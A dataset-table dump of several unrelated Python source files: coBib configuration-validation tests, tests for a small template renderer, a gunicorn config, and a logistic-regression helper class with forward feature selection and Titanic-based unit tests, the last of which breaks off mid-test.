content stringlengths 5 1.05M |
|---|
"""Tests for coBib's config validation."""
# pylint: disable=unused-argument, redefined-outer-name
import logging
import tempfile
from typing import Any, Generator, List
import pytest
from cobib.config import config
from cobib.config.config import Config
from .. import get_resource
EXAMPLE_LITERATURE = get_resource("example_literature.yaml")
def test_config_init() -> None:
"""Test Config initialization."""
# empty init
assert Config() == {}
# init from empty dictionary
assert Config({}) == {}
# init from dictionary
assert Config({"dummy": "test"}) == {"dummy": "test"}
# init from non-dictionary
with pytest.raises(TypeError):
Config(True) # type: ignore
with pytest.raises(TypeError):
Config(1) # type: ignore
with pytest.raises(TypeError):
Config("") # type: ignore
with pytest.raises(TypeError):
Config([]) # type: ignore
def test_config_getattr() -> None:
"""Test the automatic attribute generation."""
cfg = Config()
dummy = cfg.dummy
assert isinstance(cfg.dummy, Config)
assert dummy == {}
def test_config_recursive_getattr() -> None:
"""Test the recursive attribute generation."""
cfg = Config()
dummy = cfg.dummy.dummy
assert isinstance(cfg.dummy, Config)
assert isinstance(cfg.dummy.dummy, Config)
assert dummy == {}
def test_config_recursive_setattr() -> None:
"""Test the recursive attribute setting."""
cfg = Config()
cfg.dummy.dummy = "test"
assert isinstance(cfg.dummy, Config)
assert cfg.dummy.dummy == "test"
assert cfg.dummy == {"dummy": "test"}
def test_config_load() -> None:
"""Test loading another config file."""
config.load(get_resource("debug.py"))
assert config.database.file == str(EXAMPLE_LITERATURE)
def test_config_load_from_open_file() -> None:
"""Test loading another config from an open file."""
with open(get_resource("debug.py"), "r", encoding="utf-8") as file:
config.load(file)
assert config.database.file == str(EXAMPLE_LITERATURE)
def test_config_load_nothing() -> None:
"""Test that nothing changes when no XDG files are present."""
Config.XDG_CONFIG_FILE = ""
Config.LEGACY_XDG_CONFIG_FILE = ""
config.load()
# we manually call validate because load exits early
config.validate()
def test_config_load_xdg() -> None:
"""Test loading a config from XDG path."""
Config.XDG_CONFIG_FILE = get_resource("debug.py")
config.load()
assert config.database.file == str(EXAMPLE_LITERATURE)
# TODO: remove legacy configuration support on 1.1.2022
def assert_legacy_config() -> None:
"""Assert the legacy configuration has been applied."""
assert config.commands.edit.default_entry_type == "string"
assert config.commands.open.command == "string"
assert config.commands.search.grep == "string"
assert config.commands.search.ignore_case is True
assert config.database.file == "string"
assert config.database.git is True
assert config.parsers.bibtex.ignore_non_standard_types is True
assert config.tui.default_list_args == ["string"]
assert config.tui.prompt_before_quit is False
assert config.tui.reverse_order is False
assert config.tui.scroll_offset == 5
assert config.tui.colors.cursor_line_fg == "black"
assert config.tui.key_bindings.prompt == "p"
def test_config_load_legacy() -> None:
"""Test loading a legacy config file."""
config.load_legacy_config(get_resource("legacy_config.ini", "config"))
# first, it must pass the validation test
config.validate()
# then we also check that all settings have been changed somehow
assert_legacy_config()
def test_config_load_legacy_xdg() -> None:
"""Test loading a legacy config from XDG path."""
Config.XDG_CONFIG_FILE = ""
Config.LEGACY_XDG_CONFIG_FILE = get_resource("legacy_config.ini", "config")
config.load() # validation is done internally
# then we also check that all settings have been changed somehow
assert_legacy_config()
def test_config_example() -> None:
"""Test that the example config matches the default values."""
config.clear()
config.load(get_resource("example.py", "../src/cobib/config/"))
assert config == Config.DEFAULTS
def test_config_validation_failure(caplog: pytest.LogCaptureFixture) -> None:
"""Test for a `SystemExit` upon config validation failure.
Args:
caplog: the built-in pytest fixture.
"""
with pytest.raises(SystemExit):
config.load(get_resource("broken_config.py", "config"))
assert (
"cobib.config.config",
logging.ERROR,
"config.database.file should be a string.",
) in caplog.record_tuples
@pytest.fixture
def setup() -> Generator[Any, None, None]:
"""Setup debugging configuration.
Yields:
Access to the local fixture variables.
"""
config.load(get_resource("debug.py"))
yield setup
config.clear()
config.defaults()
def test_config_validation(setup: Any) -> None:
"""Test that the initial configuration passes all validation checks.
Args:
setup: a local pytest fixture.
"""
config.validate()
@pytest.mark.parametrize(
["sections", "field"],
[
[["logging"], "logfile"],
[["logging"], "version"],
[["commands", "edit"], "default_entry_type"],
[["commands", "edit"], "editor"],
[["commands", "open"], "command"],
[["commands", "search"], "grep"],
[["commands", "search"], "grep_args"],
[["commands", "search"], "ignore_case"],
[["database"], "file"],
[["database"], "git"],
[["database", "format"], "label_default"],
[["database", "format"], "label_suffix"],
[["database", "format"], "suppress_latex_warnings"],
[["database", "stringify", "list_separator"], "file"],
[["database", "stringify", "list_separator"], "tags"],
[["database", "stringify", "list_separator"], "url"],
[["parsers", "bibtex"], "ignore_non_standard_types"],
[["parsers", "yaml"], "use_c_lib_yaml"],
[["tui"], "default_list_args"],
[["tui"], "prompt_before_quit"],
[["tui"], "reverse_order"],
[["tui"], "scroll_offset"],
[["tui", "colors"], "cursor_line_fg"],
[["tui", "colors"], "cursor_line_bg"],
[["tui", "colors"], "top_statusbar_fg"],
[["tui", "colors"], "top_statusbar_bg"],
[["tui", "colors"], "bottom_statusbar_fg"],
[["tui", "colors"], "bottom_statusbar_bg"],
[["tui", "colors"], "search_label_fg"],
[["tui", "colors"], "search_label_bg"],
[["tui", "colors"], "search_query_fg"],
[["tui", "colors"], "search_query_bg"],
[["tui", "colors"], "popup_help_fg"],
[["tui", "colors"], "popup_help_bg"],
[["tui", "colors"], "popup_stdout_fg"],
[["tui", "colors"], "popup_stdout_bg"],
[["tui", "colors"], "popup_stderr_fg"],
[["tui", "colors"], "popup_stderr_bg"],
[["tui", "colors"], "selection_fg"],
[["tui", "colors"], "selection_bg"],
[["tui", "key_bindings"], "prompt"],
[["tui", "key_bindings"], "search"],
[["tui", "key_bindings"], "help"],
[["tui", "key_bindings"], "add"],
[["tui", "key_bindings"], "delete"],
[["tui", "key_bindings"], "edit"],
[["tui", "key_bindings"], "filter"],
[["tui", "key_bindings"], "modify"],
[["tui", "key_bindings"], "open"],
[["tui", "key_bindings"], "quit"],
[["tui", "key_bindings"], "redo"],
[["tui", "key_bindings"], "sort"],
[["tui", "key_bindings"], "undo"],
[["tui", "key_bindings"], "select"],
[["tui", "key_bindings"], "wrap"],
[["tui", "key_bindings"], "export"],
[["tui", "key_bindings"], "show"],
[["utils", "file_downloader"], "default_location"],
[["utils", "file_downloader"], "url_map"],
[["utils"], "journal_abbreviations"],
],
)
def test_missing_config_fields(setup: Any, sections: List[str], field: str) -> None:
"""Test raised RuntimeError for missing config fields.
Args:
setup: a local pytest fixture.
sections: a list of section names in the nested configuration.
field: the name of the configuration setting.
"""
with pytest.raises(RuntimeError) as exc_info:
section = config
for sec in sections[:-1]:
section = section[sec]
del section[sections[-1]][field]
config.validate()
assert f"config.{'.'.join(sections)}.{field}" in str(exc_info.value)
@pytest.mark.parametrize(
["color"],
[
["cursor_line_fg"],
["cursor_line_bg"],
["top_statusbar_fg"],
["top_statusbar_bg"],
["bottom_statusbar_fg"],
["bottom_statusbar_bg"],
["search_label_fg"],
["search_label_bg"],
["search_query_fg"],
["search_query_bg"],
["popup_help_fg"],
["popup_help_bg"],
["popup_stdout_fg"],
["popup_stdout_bg"],
["popup_stderr_fg"],
["popup_stderr_bg"],
["selection_fg"],
["selection_bg"],
],
)
def test_valid_tui_colors(setup: Any, color: str) -> None:
"""Test curses color specification validation.
Args:
setup: a local pytest fixture.
color: the name of the color.
"""
with pytest.raises(RuntimeError) as exc_info:
config.tui.colors[color] = "test"
config.validate()
assert str(exc_info.value) == "Unknown color specification: test"
@pytest.mark.parametrize(
["color", "ansi"],
[
["cursor_line", "\x1b[37;46m"],
["top_statusbar", "\x1b[30;43m"],
["bottom_statusbar", "\x1b[30;43m"],
["search_label", "\x1b[34;40m"],
["search_query", "\x1b[31;40m"],
["popup_help", "\x1b[37;42m"],
["popup_stdout", "\x1b[37;44m"],
["popup_stderr", "\x1b[37;41m"],
["selection", "\x1b[37;45m"],
],
)
def test_get_ansi_color(setup: Any, color: str, ansi: str) -> None:
"""Test default ANSI color code generation.
Args:
setup: a local pytest fixture.
color: the name of the color.
ansi: the expected ANSI code.
"""
assert config.get_ansi_color(color) == ansi
def test_ignored_tui_color(setup: Any, caplog: pytest.LogCaptureFixture) -> None:
"""Test invalid TUI colors are ignored.
Args:
setup: a local pytest fixture.
caplog: the built-in pytest fixture.
"""
config.tui.colors.dummy = "white"
config.validate()
assert (
"cobib.config.config",
logging.WARNING,
"Ignoring unknown TUI color: dummy.",
) in caplog.record_tuples
@pytest.mark.parametrize(["setting", "value"], [[["database", "format", "month"], str]])
def test_deprecation_warning(
setting: List[str], value: Any, caplog: pytest.LogCaptureFixture
) -> None:
"""Test logged warning for deprecated setting.
Args:
setting: the list of attribute names leading to the deprecated setting.
value: a value to use for the deprecated setting.
caplog: the built-in pytest fixture.
"""
section = config
for sec in setting[:-1]:
section = section[sec]
section[setting[-1]] = value
config.validate()
for source, level, message in caplog.record_tuples:
if (
source == "cobib.config.config"
and level == logging.WARNING
and f"The config.{'.'.join(setting)} setting is deprecated" in message
):
break
else:
assert False, "Missing deprecation warning!"
@pytest.mark.parametrize(
["setting", "attribute"], [["[FORMAT]\nmonth=str", "database.format.month"]]
)
def test_deprecation_warning_legacy(
setting: str, attribute: str, caplog: pytest.LogCaptureFixture
) -> None:
"""Test logged warning for deprecated setting.
Args:
setting: the legacy formatted string of the deprecated setting.
attribute: the new formatted name of the deprecated setting.
caplog: the built-in pytest fixture.
"""
with tempfile.NamedTemporaryFile("w") as legacy_file:
legacy_file.write(setting)
legacy_file.seek(0)
config.load_legacy_config(legacy_file.name)
config.validate()
for source, level, message in caplog.record_tuples:
if (
source == "cobib.config.config"
and level == logging.WARNING
and f"The config.{attribute} setting is deprecated" in message
):
break
else:
assert False, "Missing deprecation warning!"
|
from __future__ import print_function
import os, sys
from .pytem import Pytem
def print_err(*args):
print(*args, file=sys.stderr)
subject = Pytem("template",'globalfile')
def tag_test():
result = subject.render_string("title : Title---%title%")
print_err(result)
assert result == "<p>Title</p>"
def md_test():
result = subject.render_string("---#Hello World")
print_err(result)
assert result == "<h1>Hello World</h1>"
def dual_delim_test():
result = subject.render_string("title : Title---%title%---More Content")
print_err(result)
assert result == "<p>Title---More Content</p>"
def site_test():
os.environ["PROMPT"] = "no"
return subject.render_site("in","out")
|
import multiprocessing
bind = "0.0.0.0:5000"
workers = 1
|
import pandas as pd
import numpy as np
import seaborn as sns
import matplotlib.pyplot as plt
from sklearn.metrics import roc_auc_score, classification_report, confusion_matrix
from sklearn.model_selection import cross_validate
from pandas.api.types import is_numeric_dtype
import statsmodels.api as sm
import warnings
import time
from sklearn.linear_model import LogisticRegression
class LogisticRegressionClass:
def __init__(self,df,response,sig_level=0.05,max_iter=500,cols_to_keep_static=[],cols_to_try_individually=[],
regularization_C=None):
'''
:param df: a dataframe
:param response: a string. This must be an existing column in df
:param sig_level: a float. The significance level the forward selection will use
:param max_iter: an integer. The maximum iterations the solvers will use to try to converge
:param cols_to_keep_static: a list. Used in forward selection to not omit these columns
:param cols_to_try_individually: a list. The columns to test in a regression one at a time to identify which
one has the greatest relationship with the response controlled for the cols_to_keep_static
:param C: Regularisation contant for the l1 regulatisation. The weight multiplying the penalty term
'''
# attach attributes to the object
self.df = df.copy()
self.response = response
self.sig_level = sig_level
self.max_iter=max_iter
self.warnings = ''
self.error_message = ''
self.cols_to_keep_static = cols_to_keep_static
self.cols_to_try_individually = cols_to_try_individually
self.regularization_C = regularization_C
self.exception_message = None
if regularization_C is None:
self.sklearn_model = LogisticRegression(max_iter=self.max_iter)
else:
self.sklearn_model = LogisticRegression(max_iter=self.max_iter, penalty='l1',
C=1 / (self.regularization_C + 0.000000001), solver='liblinear')
def prepare_data(self,df,response):
y = df[response]
X = df[list(filter(lambda x: x != response, df.columns))]
X = sm.add_constant(X, has_constant='add')
return X, y
def logistic_regression_utility_check_response(self,series):
if (len(series.unique()) > 2):
self.error_message = 'The response variable has more than 2 categories and is not suitable for logistic regression'
print('The response variable has more than 2 categories and is not suitable for logistic regression')
return False
if (not is_numeric_dtype(series)):
self.error_message = self.error_message + '\n' + 'The response variable should be binary 0 and 1 and numeric type (i.e. int)'
print('The response variable should be binary 0 and 1 and numeric type (i.e. int)')
return False
return True
def log_reg_diagnostic_performance(self,X=None,y=None):
if X is None:
try:
X = self.X_with_feature_selection
y = self.y_with_feature_selection
except:
X = self.X
y = self.y
# cvs = cross_validate(LogisticRegression(max_iter=self.max_iter), X, y, cv=5,
# scoring=['accuracy', 'f1', 'precision', 'recall', 'roc_auc'])
cvs = cross_validate(self.sklearn_model, X, y, cv=5,
scoring=['accuracy', 'f1', 'precision', 'recall', 'roc_auc'])
s = """Performance (0 is negative 1 is positive)\n5-Fold Cross Validation Results:\nTest Set accuracy = {}\nf1 = {}\nprecision = {}\nrecall = {}\nauc = {}""".format(
round(cvs['test_accuracy'].mean(), 2), round(cvs['test_f1'].mean(), 2),
round(cvs['test_precision'].mean(), 2),
round(cvs['test_recall'].mean(), 2), round(cvs['test_roc_auc'].mean(), 2))
self.performance = s
self.performance_df = pd.DataFrame(data=[round(cvs['test_accuracy'].mean(), 2), round(cvs['test_f1'].mean(), 2),
round(cvs['test_precision'].mean(), 2),
round(cvs['test_recall'].mean(), 2), round(cvs['test_roc_auc'].mean(), 2)],
index=['test_accuracy','test_f1','test_precision','test_recall','test_roc_auc'],
columns=['Score'])
return s
def log_reg_diagnostic_correlations(self,X=None):
print("Correlations")
if X is None:
try:
X = self.X_with_feature_selection
except:
X = self.X
fig = plt.figure(figsize=(10, 10))
ax = fig.add_subplot(1, 1, 1)
upp_mat = np.triu(X.corr())
sns.heatmap(X.corr(), vmin=-1, vmax=+1, annot=True, cmap='coolwarm', mask=upp_mat, ax=ax)
self.fig_correlations = fig
self.ax_correlations = ax
return fig,ax
def logistic_regression_get_report(self,model=None,X=None,y=None,verbose=True):
if model is None:
try:
model = self.result_with_feature_selection
except:
model = self.result
if X is None:
try:
X = self.X_with_feature_selection
y = self.y_with_feature_selection
except:
X = self.X
y = self.y
preds = model.predict(X)
df_classification_report = pd.DataFrame(classification_report(y, preds>0.5, output_dict=True))
df_confusion = pd.DataFrame(confusion_matrix(y, preds>0.5))
df_confusion.index = list(map(lambda x: 'True_' + str(x), df_confusion.index))
df_confusion.columns = list(map(lambda x: 'Predicted_' + str(x), df_confusion.columns))
if verbose:
print("Classification Report")
print(df_classification_report)
print("Confusion Matrix")
print(df_confusion)
self.df_confusion = df_confusion
self.df_classification_report = df_classification_report
return df_confusion
def prepare_categories(self,df, response, drop=False):
cat_cols = list(filter(lambda x: not is_numeric_dtype(df[x]), df.columns))
cat_cols = list(set(cat_cols) - {response} - set(self.cols_to_keep_static))
df = pd.get_dummies(df, columns=cat_cols, drop_first=drop)
df = pd.get_dummies(df, columns=self.cols_to_keep_static, drop_first=True)
self.cols_to_keep_static_dummified = []
for col in self.cols_to_keep_static:
for col_dummy in df.columns:
if col in col_dummy:
self.cols_to_keep_static_dummified.append(col_dummy)
return df
def get_interpretation(self,result=None,feature_list=None,df=None):
'''
Given a trained model, calculate the average probabilities due to feature changes
'''
if (result is None) or (feature_list is None):
try:
feature_list = self.X_with_feature_selection.columns
result = self.result_with_feature_selection
except:
feature_list = self.X.columns
try:
result = self.result
except:
result = self.basic_result
# take a copy of the original df and prepare the dataset
if df is None:
df = self.df.copy()
df_temp = df.copy()
df_temp = self.prepare_categories(df_temp, self.response, drop=False)
X, y = self.prepare_data(df_temp,self.response)
full_feature_list = list(feature_list)
if 'const' not in full_feature_list:
full_feature_list = ['const'] + full_feature_list
# comparative uplift section
comparative_dict = dict()
for col1 in df.columns:
for col2 in full_feature_list:
# if this feature was dummified
if col1 + '_' in col2:
t = X[full_feature_list].copy()
# First get prediction with 0
t[col2] = 0
comparative_dict[col2] = [result.predict(t).mean()]
# Then get prediction with 1
t[col2] = 1
comparative_dict[col2].append(result.predict(t).mean())
elif col1 == col2:
t = X[full_feature_list].copy()
# first get prediction with average
t[col2] = t[col2].mean()
comparative_dict[col2] = [result.predict(t).mean()]
# then get prediction with +1
t[col2] = t[col2] + 1
comparative_dict[col2].append(result.predict(t).mean())
feature_interpretability_comparative_df = pd.DataFrame(comparative_dict).T
feature_interpretability_comparative_df.columns = ['Prediction_average_or_without','Prediction_add1_or_with']
feature_interpretability_comparative_df['diff'] = feature_interpretability_comparative_df['Prediction_add1_or_with'] - feature_interpretability_comparative_df['Prediction_average_or_without']
self.feature_interpretability_comparative_df = feature_interpretability_comparative_df
# get a base probability (this is just the average probability)
base_probability = result.predict(X[full_feature_list]).mean()
probability_dict = dict()
probability_dict['base'] = base_probability
# for each column in the original df
for col in df.columns:
# for each column in the result's feature list
for col2 in feature_list:
# check if this feature was dummified from this column
if col + '_' in col2:
# if this feature was dummified from this column then update this column to be this feature value
df_temp = df.copy()
df_temp[col] = col2.replace(col + '_', '')
df_temp = self.prepare_categories(df_temp, self.response, drop=False)
X, y = self.prepare_data(df_temp, self.response)
# check that all features the model is expecting exist in X
for col3 in feature_list:
if col3 not in X.columns:
X[col3] = 0
# calculate the probability
probability = result.predict(X[full_feature_list]).mean()
probability_dict[col2] = probability
elif col == col2:
# if this column was not dummified then it is numeric so add 1 to it
df_temp = df.copy()
df_temp[col] = df_temp[col] + 1
df_temp = self.prepare_categories(df_temp, self.response, drop=False)
X, y = self.prepare_data(df_temp, self.response)
probability = result.predict(X[full_feature_list]).mean()
probability_dict[col2] = probability
# save the probability dictionary
self.feature_interpretability_dict = probability_dict
self.feature_interpretability_df = pd.DataFrame(data=probability_dict.values(), index=probability_dict.keys(), columns=['Probability'])
return self.feature_interpretability_df
def log_reg_basic(self,df=None):
'''
Run a basic logistic regression model
'''
if df is None:
df = self.df
X, y = self.prepare_data(df, self.response)
model = sm.Logit(y, X)
if self.regularization_C is None:
result = model.fit(disp=0,maxiter=self.max_iter)
else:
result = model.fit_regularized(disp=0, maxiter=self.max_iter,alpha=self.regularization_C)
self.basic_result = result
self.basic_model = model
self.X = X
self.y = y
return result
def predict_from_original(self,df):
df = self.prepare_categories(df, self.response, drop=False)
try:
all_cols = list(self.X_with_feature_selection.columns)
except:
all_cols = list(self.X.columns)
if 'const' not in df.columns:
df['const'] = 1
for col in all_cols:
if col not in df.columns:
df[col] = 0
try:
res = self.result_with_feature_selection
except:
res = self.result
return res.predict(df[all_cols])
def log_reg(self,df=None):
if df is None:
df1 = self.df[~self.df.isna().any(axis=1)].copy()
if len(df1) < len(self.df):
warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(len(self.df),
len(df1))
warnings.warn(warning_message)
print(warning_message)
self.warnings = self.warnings + '\n' + warning_message
else:
df1 = df[~df.isna().any(axis=1)].copy()
if len(df1) < len(df):
warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(
len(df),
len(df1))
warnings.warn(warning_message)
print(warning_message)
self.warnings = self.warnings + '\n' + warning_message
if not self.logistic_regression_utility_check_response(df1[self.response]):
return None
df1 = self.prepare_categories(df1,self.response,drop=True)
result = self.log_reg_basic(df1)
self.result = result
self.model = self.basic_model
return result
def log_reg_with_feature_selection(self,df=None,run_for=0,verbose=True,max_pr2=None,max_features=None):
import warnings
self.params_with_convergence_errors = []
# start the timer in case the is a time limit specified
start_time = time.time()
n_features = 0
if df is None:
# get rid of nans. There should be no nans. Imputation should be performed prior to this point
df1 = self.df[~self.df.isna().any(axis=1)].copy()
# show a warning to let the user know of the droppped nans
if len(df1) < len(self.df):
warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(
len(self.df),
len(df1))
warnings.warn(warning_message)
print(warning_message)
self.warnings = self.warnings + '\n' + warning_message
else:
# get rid of nans. There should be no nans. Imputation should be performed prior to this point
df1 = df[~df.isna().any(axis=1)].copy()
# show a warning to let the user know of the droppped nans
if len(df1) < len(df):
warning_message = 'There are NaNs in the dataset. After removing NaNs, the rows reduce from {} to {}'.format(
len(df),
len(df1))
warnings.warn(warning_message)
print(warning_message)
self.warnings = self.warnings + '\n' + warning_message
# check that the response is in the correct format to perform logistic regression
if not self.logistic_regression_utility_check_response(df1[self.response]):
return None
# automatically identify categorical variables and dummify them
df1 = self.prepare_categories(df1, self.response, drop=False)
# raise a warning if the number of columns surpasses the number of rows
if len(df1.columns) > len(df1):
warnings.warn(
'Note: The number of columns after getting dummies is larger than the number of rows. n_cols = {}, nrows = {}'.format(
len(df1.columns), len(df1)))
print(
'Note: The number of columns after getting dummies is larger than the number of rows. n_cols = {}, nrows = {}'.format(
len(df1.columns), len(df1)))
# the initial list of features
remaining = list(set(df1.columns) - {self.response} - set(self.cols_to_keep_static_dummified))
# this holds the tried and successful feature set
full_feature_set = self.cols_to_keep_static_dummified
# get the first logistic regression output for only the constant/base model
first_result = self.log_reg_basic(df1[[self.response]])
# save the model and the X and y used to train it
self.X_with_feature_selection = self.X.copy()
self.y_with_feature_selection = self.y.copy()
self.model_with_feature_selection = self.basic_model
# get the pseudo r2 of the base model
prsquared = first_result.prsquared
# store the result of the first model
final_result = first_result
# while there are still remaining features to try keep looping
while len(remaining) > 0:
# store the last pseudo r2 value
last_prsquared = prsquared
# the next feature to add to the full feature set
next_col = None
# the result corresponding to the addition of the next col
next_result = None
# try adding each column from the remaining columns
for col in sorted(remaining):
# add the next column to the feature set and try it out. Try except is added because sometimes
# when categorical variables are dummified and you add both variables you get a singular matrix
this_feature_set = full_feature_set + [col]
try:
with warnings.catch_warnings():
warnings.filterwarnings("ignore")
result = self.log_reg_basic(df1[this_feature_set + [self.response]])
except Exception as e:
self.exception_message = e
self.params_with_convergence_errors.append(col)
remaining.remove(col)
continue
# the resulting pseudo r2 from this fit
this_prsquared = result.prsquared
# if a feature results in nan for pseudo r2 skip it
if this_prsquared is np.nan:
print('Note: Feature {} is resulting with a nan adjusted r2. Skipping feature'.format(col))
continue
# this feature is recorded as a candidate if the conditions are met
if (this_prsquared > last_prsquared) and (result.pvalues.loc[col] <= self.sig_level):
last_prsquared = this_prsquared
next_col = col
next_result = result
# save the model and the X and y used to train it
self.X_with_feature_selection = self.X.copy()
self.y_with_feature_selection = self.y.copy()
self.model_with_feature_selection = self.basic_model
# if after the loop no new candidates were found then we stop looking
if next_col is None:
break
# add the candidate to the permanent list
full_feature_set.append(next_col)
n_features = n_features+1
# show progress
if verbose:
print('********Adding {} with prsquared = {}********'.format(next_col, last_prsquared))
# store the result
final_result = next_result
# remove the chosen candidate from the remaining features
remaining.remove(next_col)
# if the user has specified a max r2 then stop if it has been reached
if (max_pr2 is not None) and (max_pr2 <= last_prsquared):
break
# if the user has specified a max number of features then stop if it has been reached
if (max_features is not None) and (max_features <= n_features):
break
# check if it's not taking too long
if (time.time() - start_time > run_for) and (run_for > 0):
print(
'Aborting: Has been running for {}s > {}s. {} out of {} columns left. There are probably too many categories in one of the columns'.format(
round(time.time() - start_time, 2), run_for, len(remaining), len(df1.columns) - 1))
return
self.final_feature_set = full_feature_set
self.result_with_feature_selection = final_result
if (len(self.params_with_convergence_errors) > 0) & verbose:
print('There were converge errors. See params_with_convergence_errors for the list of columns')
return final_result
def log_reg_one_at_a_time(self,with_feature_selection=False,get_interpretability=False):
dic = dict()
df1 = self.df.copy()
df1 = df1[[self.response]+self.cols_to_keep_static + self.cols_to_try_individually].copy()
for this_col_to_try in self.cols_to_try_individually:
if with_feature_selection:
result = self.log_reg_with_feature_selection(df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
if get_interpretability:
self.get_interpretation(self.result_with_feature_selection,self.final_feature_set
,df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
else:
result = self.log_reg(df=df1[self.cols_to_keep_static + [self.response,this_col_to_try]])
if get_interpretability:
self.get_interpretation(self.result, self.X.columns
, df=df1[self.cols_to_keep_static + [self.response, this_col_to_try]])
for col in list(filter(lambda x: this_col_to_try in x,result.params.index)):
if get_interpretability:
dic[col] = [result.params[col],result.pvalues[col],self.feature_interpretability_df['Probability'][col],
self.feature_interpretability_df['Probability']['base']]
else:
dic[col] = [result.params[col], result.pvalues[col]]
df_one_at_a_time = pd.DataFrame(dic).T
if get_interpretability:
df_one_at_a_time.columns = ['Coefficient','Pvalue','Controlled Probability','Base Probability']
else:
df_one_at_a_time.columns = ['Coefficient','Pvalue']
self.df_one_at_a_time = df_one_at_a_time
return df_one_at_a_time
def unit_test_1():
print('Unit test 1...')
import sys
import os
import warnings
np.random.seed(101)
#warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df = df.dropna()
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05)
my_logistic_regresion_class.log_reg_basic()
result_required = [2.75415827153399, -1.2422486253277711, 2.6348448348873723, -0.043952595897772694, -0.375754870508454, -0.06193736644803373, 0.002160033540727779]
result_actual = list(my_logistic_regresion_class.basic_result.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
result_required = 0.4061624649859944
result_actual = my_logistic_regresion_class.basic_result.predict(my_logistic_regresion_class.X).mean()
result_required = round(result_required, 2)
result_actual = round(result_actual, 2)
assert (result_required == result_actual)
result_required = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.79
f1 = 0.73
precision = 0.76
recall = 0.7
auc = 0.85'''
result_actual = my_logistic_regresion_class.log_reg_diagnostic_performance()
assert (result_required == result_actual)
result_required = [0.4061624649859944, 0.24581360407372246, 0.795820946281563, 0.3999162261394402, 0.3539768140703711, 0.39737068898845873, 0.4064703482674913]
result_actual = list(my_logistic_regresion_class.get_interpretation()['Probability'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
result_required = [0.22395117322839098, 0.3558311002657131, 0.3977261128754439, 0.4027792667251947,
0.4068054774641371, 0.8543626808843827]
result_actual = sorted(list(my_logistic_regresion_class.feature_interpretability_comparative_df['Prediction_add1_or_with']))
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
print('Success!')
def unit_test_2():
print('Unit test 2...')
import sys
import os
import warnings
np.random.seed(101)
warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df['Sex'] = df['Sex'].map({'male': 0, 'female': 1})
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df = df.dropna()
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05)
my_logistic_regresion_class.log_reg()
result_required = [2.75415827153399, -1.2422486253277711, 2.6348448348873723, -0.043952595897772694, -0.375754870508454, -0.06193736644803373, 0.002160033540727779]
result_actual = list(my_logistic_regresion_class.basic_result.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
result_required = 0.4061624649859944
result_actual = my_logistic_regresion_class.basic_result.predict(my_logistic_regresion_class.X).mean()
result_required = round(result_required, 2)
result_actual = round(result_actual, 2)
assert (result_required == result_actual)
result_required = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.79
f1 = 0.73
precision = 0.76
recall = 0.7
auc = 0.85'''
result_actual = my_logistic_regresion_class.log_reg_diagnostic_performance(my_logistic_regresion_class.X,
my_logistic_regresion_class.y)
assert (result_required == result_actual)
result_required = [0.4061624649859944, 0.24581360407372246, 0.795820946281563, 0.3999162261394402,
0.3539768140703711, 0.39737068898845873, 0.4064703482674913]
result_actual = list(my_logistic_regresion_class.get_interpretation()['Probability'])
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (result_required == result_actual)
print('Success!')
def unit_test_3():
print('Unit test 3...')
import sys
import os
import warnings
np.random.seed(101)
warnings.filterwarnings("ignore")
current_dir = '/'.join(sys.path[0].split('/')[:-1]) # sys.path[0]
data_dir = os.path.join(current_dir, 'Data', 'titanic')
titanic_csv = os.path.join(data_dir, 'titanic.csv')
df = pd.read_csv(titanic_csv)
df = df[['Survived', 'Pclass', 'Sex', 'Age', 'SibSp','Parch', 'Fare']]
df = df.dropna()
my_logistic_regresion_class = LogisticRegressionClass(df,'Survived',sig_level=0.05)
my_logistic_regresion_class.log_reg()
result_required = [5.389003106421364, -1.2422486253277716, -0.043952595897772714, -0.3757548705084541, -0.0619373664480337, 0.002160033540727774, -2.6348448348873723]
result_actual = list(my_logistic_regresion_class.result.params)
result_required = list(map(lambda x: round(x, 2), result_required))
result_actual = list(map(lambda x: round(x, 2), result_actual))
assert (sorted(result_required) == sorted(result_actual))
result_required = 0.4061624649859944
result_actual = my_logistic_regresion_class.result.predict(my_logistic_regresion_class.X).mean()
result_required = round(result_required, 2)
result_actual = round(result_actual, 2)
assert (result_required == result_actual)
result_required = '''Performance (0 is negative 1 is positive)
5-Fold Cross Validation Results:
Test Set accuracy = 0.79
f1 = 0.73
precision = 0.76
recall = 0.7
auc = 0.85'''
result_actual = my_logistic_regresion_class.log_reg_diagnostic_performance(my_logistic_regresion_class.X,
my_logistic_regresion_class.y)
assert (result_required == result_actual)
